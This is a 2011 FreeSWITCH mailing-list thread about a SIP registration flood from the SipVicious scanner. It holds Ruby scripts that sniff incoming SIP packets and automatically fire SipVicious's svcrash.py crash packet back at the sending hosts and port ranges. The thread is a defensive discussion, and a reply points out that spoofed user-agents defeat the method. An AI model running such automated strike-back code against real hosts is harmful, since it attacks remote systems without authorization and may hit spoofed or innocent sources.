[Freeswitch-users] SPIT attack and how to strike back

Kerem Erciyes kerem.erciyes at gmail.com
Thu Apr 21 15:10:19 MSD 2011 

That would work until attacker defines a custom user-agent string. There has
been reports of modified SipVicious code using Asterisk PBX as the agent.

On Thu, Apr 21, 2011 at 4:13 AM, Denis Galvao <denisgalvao at gmail.com> wrote:

> Nice! Thanks for sharing!
>
> Denis
>
> 2011/4/20, Peter P GMX <Prometheus001 at gmx.net>:
> > Hello all,
> >
> > I would like to share this with you as you may have also been affected
> > by this threat.
> >
> > Yesterday we received a SPIT attack to our Freeswitch servers. We had
> > about 50 register requests/sec. We noticed this as we saw a slight
> > increase in the load of the Freeswitch servers. Fortunately Freeswitch
> > can handle a huge amount of register requests so we had no denial of
> > service.
> >
> > You can identify this attack by finding the following in the Register
> > message:
> >     User-Agent: friendly-scanner
> >
> > How to get rid of it:
> > The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a
> > nice tool "svcrash.py" wich can send a malformed packet back to the
> > attacker which crashes their own Sipvicious tool. You can issue this tool
> by
> >   python svcrash.py -d <host of attacker> -p <port of attacker>
> > You will need port 5060 on your machine to work. But there is also a
> > workaround for that. svcrash.py will show how to overcome this if your
> > port 5060 is not available.
> > Download it here
> > http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
> > unpack it to a folder of your choice.
> >
> > I wrote a small Ruby script to send the packet back to a port range, as
> > our attacker used some dozens of ports to send.
> > Here is the script (Install ruby first by "apt-get install ruby" e.g. on
> > Debian based systems). Put it into the sipvicious directory
> > kill_ports.rb:
> >
> > #!/usr/bin/env ruby
> > host=ARGV[0]
> > start_port=ARGV[1].to_i
> > end_port=ARGV[2].to_i
> > start_port.upto(end_port) do |port|
> >   cmd="python svcrash.py -d #{host} -p #{port}"
> >   p cmd
> >   erg=`#{cmd}`
> >   p erg
> > end
> >
> > You now can run it by
> > ./kill_ports.rb <ip> <from_port> <to_port>
> >
> > By using this tool we got rid of most of the SPIT messages. But after a
> > while they started again to attack us from different ports.
> >
> > The next step is: Why not automate this by trying to identify host and
> > port automatically and send back the svcrash.py packet to the sender's
> port?
> >
> > First install the pcap library
> >     apt-get install libpcap-dev libpcap-ruby
> >
> > Then I wrote the following tool to automate this, it makes use of the
> > kill_ports.rb above:
> > strike_back.rb:
> >
> > #!/usr/bin/env ruby
> > # I used some code from http://snippets.dzone.com/posts/show/5931
> > require 'pcaplet'
> > require 'logger'
> > require 'timeout'
> > @timeout=3600 # max runtime: 1 hour
> >
> > @logfile='strike_back.log'
> > class AuditLogger < Logger
> >   def format_message(severity, timestamp, progname, msg)
> >     puts msg
> >     "#{msg}\n"
> >   end
> > end
> >
> > logfile = File.open(@logfile, 'a')
> > LOGGER = AuditLogger.new(logfile)
> > LOGGER.level = Logger::INFO
> > search="friendly-scanner"
> > puts"Searching for '#{ search}' in SIP packets"
> > $network = Pcaplet.new('-s 1500')
> > $filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)
> > $network.add_filter($filter)
> > puts "Logfile: #{@logfile}"
> > puts "Starting capture..."
> > begin
> >   Timeout.timeout(@timeout) do # 3600 sec
> >     for p in $network
> >         header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")}
> > #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"
> >         if $filter =~ p
> >             #puts "simple search"
> >             if p.udp_data.index(search)
> >               LOGGER.info "Kill Friendly scanner #{p.src} with Source
> > Port #{p.sport}"
> >               cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"
> >               erg=`#{cmd}`
> >               p erg
> >               LOGGER.info header
> >               LOGGER.info p.udp_data
> >             end
> >         end
> >     end
> >   end
> > rescue Timeout::Error
> >   logfile.flush
> >   puts "Timeout - finished."
> > end
> >
> > There may be a better way to code this, but at least it worked. After
> > about 15min the number of attacks went to 0.
> >
> > Disclaimer: You can damage other systems by using these tools. So be
> > carefull and use at your own risks. Do not use this tool for attacking
> > other systems!
> >
> > Best regards
> > Peter
> >
> > _______________________________________________
> > FreeSWITCH-users mailing list
> > FreeSWITCH-users at lists.freeswitch.org
> > http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
> > UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
> > http://www.freeswitch.org
> >
>
> --
> Enviado do meu celular
>
> _______________________________________________
> FreeSWITCH-users mailing list
> FreeSWITCH-users at lists.freeswitch.org
> http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
> UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
> http://www.freeswitch.org
>



-- 
Kerem Erciyes - Sistem Danismani
http://keremerciyes.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.freeswitch.org/pipermail/freeswitch-users/attachments/20110421/2adbd6aa/attachment-0001.html

More information about the FreeSWITCH-users mailing list